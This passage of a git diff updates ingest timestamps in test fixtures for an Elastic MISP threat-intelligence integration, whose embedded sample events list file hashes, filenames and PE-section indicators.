meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": "indicator", @@ -1340,7 +1340,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827898042Z", + "ingested": "2021-12-09T13:49:02.949003Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266273\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"sha256\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":true,\"type\":\"sha256\",\"uuid\":\"803f10bd-9087-4169-8699-277579a92693\",\"value\":\"567caa7653723f8818ec9eb6f2e27f6d9d8c0aca0c96fc457659340e7bbdc665\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": "indicator", @@ -1415,7 +1415,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827903663Z", + "ingested": "2021-12-09T13:49:02.949008700Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266274\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"filename\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":true,\"type\":\"filename\",\"uuid\":\"e5c7a9f0-c0e1-4024-9ab8-de8a1b403e4f\",\"value\":\"object5.txt\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": "indicator", @@ -1506,7 +1506,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827909424Z", + "ingested": "2021-12-09T13:49:02.949014300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266278\",\"last_seen\":null,\"object_id\":\"18210\",\"object_relation\":\"text\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200348\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"955e34a5-a630-42c9-868d-6e3dcb575987\",\"value\":\"Excutable create bad pipe\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18210\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1622200348\",\"uuid\":\"afe43d99-d8b6-47fa-8e7b-3d3ece2f8366\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", @@ -1597,7 +1597,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827914784Z", + "ingested": "2021-12-09T13:49:02.949020Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266281\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"size-in-bytes\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":false,\"type\":\"size-in-bytes\",\"uuid\":\"2fa7721b-ad73-4914-b082-8d44233ced98\",\"value\":\"3892\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", @@ -1688,7 +1688,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827934551Z", + "ingested": "2021-12-09T13:49:02.949025700Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266283\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"name\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"d35c1ff8-a69c-482b-8fb0-1182988d9468\",\"value\":\".data\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", @@ -1779,7 +1779,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827943458Z", + "ingested": "2021-12-09T13:49:02.949031300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266284\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"text\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"dc11971a-a676-4676-b24c-a45a8791e0b0\",\"value\":\"Extracted zip archive data\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", @@ -1870,7 +1870,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827949679Z", + "ingested": "2021-12-09T13:49:02.949037Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266285\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"entropy\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":false,\"type\":\"float\",\"uuid\":\"a85c0cbb-25a8-4bc9-b146-3cba1020e5bb\",\"value\":\"7.93280431051\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", @@ -1965,7 +1965,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827955981Z", + "ingested": "2021-12-09T13:49:02.949089200Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266279\",\"last_seen\":null,\"object_id\":\"18210\",\"object_relation\":\"md5\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200348\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"1c97c043-5de2-41a1-b591-3237174cd290\",\"value\":\"7392463caf95534d56460bc9f360adc1\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18210\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1622200348\",\"uuid\":\"afe43d99-d8b6-47fa-8e7b-3d3ece2f8366\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", @@ -2060,7 +2060,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827962123Z", + "ingested": "2021-12-09T13:49:02.949092700Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266282\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"md5\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"f3b8696e-5390-4383-ace2-6e06bfae497d\",\"value\":\"7295463caf95534d56460bc9f360adc1\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", @@ -2153,7 +2153,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827968194Z", + "ingested": "2021-12-09T13:49:02.949097100Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266280\",\"last_seen\":null,\"object_id\":\"18210\",\"object_relation\":\"filename\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200348\",\"to_ids\":true,\"type\":\"filename\",\"uuid\":\"2dfcb937-e6af-4b5d-ad50-f8eb975990f3\",\"value\":\"badmojopipe.exe\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18210\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1622200348\",\"uuid\":\"afe43d99-d8b6-47fa-8e7b-3d3ece2f8366\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", diff --git a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log index 9d5d08841fd..020dd5b27f7 100644 --- a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log +++ b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log @@ -1,8 +1,8 @@ {"Event":{"Attribute":{"Galaxy":[],"ShadowAttribute":[],"category":"Payload delivery","comment":"- Xchecked via VT: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e","deleted":false,"disable_correlation":false,"distribution":"5","event_id":"5","first_seen":null,"id":"351","last_seen":null,"object_id":"0","object_relation":null,"sharing_group_id":"0","timestamp":"1503930272","to_ids":true,"type":"md5","uuid":"59a427a0-f6f8-4178-9e7d-dfd702de0b81","value":"f2679bdabe46e10edc6352fff3c829bc"},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files 